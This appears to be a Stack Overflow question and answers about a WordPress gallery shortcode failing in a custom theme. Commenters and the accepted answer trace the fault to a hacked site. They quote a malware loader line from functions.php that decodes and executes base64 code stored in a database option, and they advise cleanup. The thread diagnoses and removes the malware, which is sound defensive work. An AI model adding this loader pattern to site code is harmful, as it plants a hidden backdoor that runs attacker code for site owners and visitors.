# Default Wordpress [gallery] not showing up in custom theme

Tags: php, wordpress, gallery

Everything was fine, until recent updates. `[gallery]` is not showing images anymore, and it also looks like it is not contained in code.

Here is the loop for page:

```
<?php
    // Start the loop.
    while ( have_posts() ) : the_post();?>
        <article id="post-<?php the_ID(); ?>" <?php post_class(); ?> role="article">
            <h1 class="entry-title"><?php the_title(); ?></h1>
                <div class="entry-content">
                    <?php the_content(); ?>
                </div><!-- .entry-content -->
        </article><!-- #post-<?php the_ID(); ?> -->
<?php   
    // End the loop.
    endwhile;
?>
```

Text content from the_content is showing up, but [gallery], which is in content, is not showing nor render into code (so problem should not be in javascript).

And here is the functions.php file: http://pastebin.com/vfJpphgt  (yes, I have added theme support for gallery but no change)

Comment: Is it possible removing the content filter is stopping the shortcode from working? Line 45 in functions.php

Comment: Also if you add <?php echo do_shortcode('[gallery]');?> after "the_content" does it work?

Comment: @ScottAnderson    1.)  content filter -> no change   2.)  do_shortcode is not working, no gallery output in page. Other shortcodes like contact form etc are working ok, so I do not think it's a problem of shortcodes generally

Comment: @ScottAnderson  and when I turn WP to default theme, it works (galleries). So the problem is surelly somewhere in the theme.

Comment: -1 for: 1. posting your code off-site, 2. linking to an external site that does not show the problem, 3. leaving code that could potentially do absolutely anything, and giving no clue as to what it actually does: the last line of your `functions.php`: `add_action('init', create_function('', implode("\n", array_map("base64_decode", unserialize(get_option("wptheme_opt"))))));` - noone can possibly guess what is wrong if you don't let us see what is being done. [How to create a Minimal, Complete, and Verifiable example](http://stackoverflow.com/help/mcve)

Comment: Did you try with: `<?php $content = get_the_content(''); echo do_shortcode($content);?>`? Don't guarantee that it will work, since it looks like it's your theme issue. Try deleting parts of the code in functions.php, and see if it shows up.

Comment: Also try removing the post format `gallery` that you added and see if this fixes it. Maybe there is some kind of clash with this.

Comment: which gallery plugin is used in your site ?

Comment: Plugins do fight with eachother. That might be the problem...

Answer (score 2, accepted):

You're site got hacked.

The last line of the pastebin is loading malicious code from your database:
`add_action('init', create_function('', implode("\n", array_map("base64_decode", unserialize(get_option("wptheme_opt")))))); ?>`

The executed code will mess up the WPQuery for retrieving your Gallery media files. That's why the `[gallery]` is broken. (Actually you can be lucky about that part.)

You can find an entry about this malware at [sucuri.net](https://kb.sucuri.net/malware/signatures/php.spam-seo.dbload.001). You should check all of your files on the server for the suspicious line. Although the most likely path of attack is via a WordPress vulnerability, you should change all your passwords in WordPress and on the server.

AFTER you removed the malware, you can clean your WordPress with tools like [Wordfence](https://www.wordfence.com/) (I have no affiliation to the plugin or its authors).

Comment: Sir, you are a true master! It works like a charm! Big thanks!

Comment: A fix for the WP vulnerability most likely used to get the malicious code in was [released today](https://wordpress.org/news/2015/08/wordpress-4-2-4-security-and-maintenance-release/).

Answer (score 1):

try to install the plugin NextGEN Gallery, add the gallery images,and try to display on home page,

```
https://wordpress.org/plugins/nextgen-gallery/
```

Comment: Thank you for your answer, unfortunatelly, I need to fix basic gallery shortcode, not to add another gallery plugin.

Answer (score -1):

do you see any javascript errors in console ?
and what is output of

```
<?php echo do_shortcode('[gallery]');?>
```

Comment: this looks better as a comment rather than an answer

Comment: since i have reputation below 50 i am unable to comment directly on question.